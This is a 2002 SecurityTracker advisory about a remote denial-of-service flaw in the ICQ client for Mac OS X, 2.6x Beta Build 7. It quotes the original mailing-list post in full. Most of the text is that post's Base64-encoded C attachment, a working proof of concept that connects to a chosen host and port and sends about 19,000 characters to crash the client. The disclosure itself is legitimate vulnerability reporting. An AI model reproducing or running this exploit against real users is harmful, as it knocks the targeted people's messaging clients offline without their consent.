ICQ Instant Messaging Client for Mac OS X Can Be Crashed By Remote Users
|
|
SecurityTracker Alert ID: 1003449 |
|
SecurityTracker URL: http://securitytracker.com/id/1003449
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 6 2002
|
Impact:
Denial of service via network
|
Exploit Included: Yes
|
Version(s): 2.6x Beta Build 7
|
Description:
A denial of service vulnerability was reported in the ICQ instant messaging client for Mac OS X. A remote user can cause the client to crash.
A remote user can connect to the port that the ICQ client has bound to (which reportedly tends to be ports 49152 and 49159 but may include others) and send approximately 19,000 characters to cause the client to crash.
A demonstration exploit is included in the Source Message (it is Base64 encoded).
|
Impact:
A remote user can cause the ICQ client to crash.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.icq.com/ (Links to External Site)
|
Cause:
Not specified
|
Underlying OS:
MacOS, UNIX (OS X)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 5 Feb 2002 11:00:45 -0500 (EST)
Subject: OSX ICQ DoS
|
--0-1297166189-1012924845=:77895
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hello,
I looked a bit for this problem on the web, and cant find it so
I am posting it here. Yeah, so its a lame DoS for several versions of
OSX's ICQ clients. Version information is in the comment space of the
proof of concept exploit code I have included below. This was a quick
hack based on some code I authored that exploited a similar problem with
some earlier versions of Licq. I was learning basic socket coding at the
time I wrote the Licq thingy, but nonetheless here is the code that works
on ICQ MacOSX Ver 2.6x Beta Build 7 and others.
--0-1297166189-1012924845=:77895
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="osxicq.c"
Content-Transfer-Encoding: BASE64
Content-ID: <20020205110045.P77895@tasam.com>
Content-Description: osxicq dos proof
Content-Disposition: attachment; filename="osxicq.c"
LyoNCiAqIE9TWCBJQ1EgRG9zLiBzYTdvcmlAdGFzYW0uY29tDQogKiBQcm9v
ZiBvZiBjb25jZXB0LiBXb3JrZWQgb24gZWFybHkgdmVyc2lvbnMgb2YgTGlj
cS4gTm93IGl0IGFwcGFyZW50bHkgd29ya3MNCiAqIGZvciB2YXJpb3VzIHZl
cnNpb25zIG9mIE9TWCBJQ1EgY2xpZW50cy4NCiAqIFRlc3RlZCBhbmQgd29y
a3Mgb246IElDUSBNYWNPU1ggVmVyIDIuNnggQmV0YSBCdWlsZCA3DQogKiBh
bmQgc2V2ZXJhbCBvdGhlcnMuDQogKi8NCg0KI2luY2x1ZGUgPG5ldGRiLmg+
DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUgPHN5cy90eXBl
cy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzdGRp
by5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHN0cmluZy5o
Pg0KI2luY2x1ZGUgPGVycm5vLmg+DQoNCmludCBtYWluKGludCBhcmdjLCBj
aGFyICoqYXJndil7DQogIGNoYXIgYnVmWzE5MDAwXTsgaW50IGksIHNvY2ss
IHJlc3VsdDsgc3RydWN0IHNvY2thZGRyX2luIHNpbjsgc3RydWN0IGhvc3Rl
bnQgKmdvdGhvc3Q7DQogIHByaW50ZigiU28geW91IHdhbm5hIERvUyBJQ1Eu
Li5cbiBzYTdvcmlAdGFzYW0uY29tXG5CUkFBQUFBWklJSUlJSUlMXG4iKTsN
CiAgaWYgKGFyZ2MgPCAzKSB7DQogICAgICBmcHJpbnRmKHN0ZGVyciwgIlVz
YWdlOiAlcyA8aWNxY2xpZW50PiA8cG9ydD5cbmplZXouIGdldCBpdCByaWdo
dC5cbiIsIGFyZ3ZbMF0pOw0KICAgICAgZXhpdCgtMSk7DQogICAgfQ0KICBn
b3Rob3N0ID0gZ2V0aG9zdGJ5bmFtZShhcmd2WzFdKTsNCiAgaWYgKCFnb3Ro
b3N0KXsNCiAgICAgIGZwcmludGYoc3RkZXJyLCAiJXM6IEhvc3QgcmVzb2x2
IGZhaWxlZC4gVGFyZC5cbiIsIGFyZ3ZbMV0pOw0KICAgICAgZXhpdCgtMSk7
DQogICAgfQ0KICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7IHNpbi5zaW5f
cG9ydCA9IGh0b25zKGF0b2koYXJndlsyXSkpOw0KICBzaW4uc2luX2FkZHIg
PSAqKHN0cnVjdCBpbl9hZGRyICopZ290aG9zdC0+aF9hZGRyOyBzb2NrID0g
c29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCAwKTsNCiAgcmVzdWx0ID0g
Y29ubmVjdChzb2NrLCAoc3RydWN0IHNvY2thZGRyICopJnNpbiwgc2l6ZW9m
KHN0cnVjdCBzb2NrYWRkcl9pbikpOw0KICBpZiAocmVzdWx0ICE9IDApIHsN
CiAgICAgIGZwcmludGYoc3RkZXJyLCAiQ29ubmVjdCBGYWlsZWQuIHJlVGFy
ZC4gJXNcbiIsIGFyZ3ZbMV0pOw0KICAgICAgZXhpdCgtMSk7DQogICAgfQ0K
ICBpZiAoc29jayA8IDApew0KICAgICAgZnByaW50ZihzdGRlcnIsICJFcnJv
ciBpbiBzb2NrZXQuIik7DQogICAgICBleGl0KC0xKTsNCiAgICB9DQogIGZv
ciAoaT0wOyBpPDE5MDAwOyBpKyspIC8qIHNlbmQgbG9vcCBzaGFib2luZyBi
b2luZyBib2luZyAqLw0KICAgIHN0cm5jYXQoYnVmLCAiQSIsIDEpOw0KICBz
ZW5kKHNvY2ssIGJ1Ziwgc2l6ZW9mKGJ1ZiksIDApOw0KICBjbG9zZShzb2Nr
KTsNCiAgZnByaW50ZihzdGRvdXQsICJTaGlucnl1SGFkb2tlblxuLi5BbmQg
YW4gYW5ncnkgZmx1cnJ5IG9mIEFzIGZsaWVzIGZyb20geW91ciBvdXRzdHJl
YWNoZWQgaGFuZC4gaGVoLlxuXG4iKTsNCn0NCg==
--0-1297166189-1012924845=:77895--
|
|
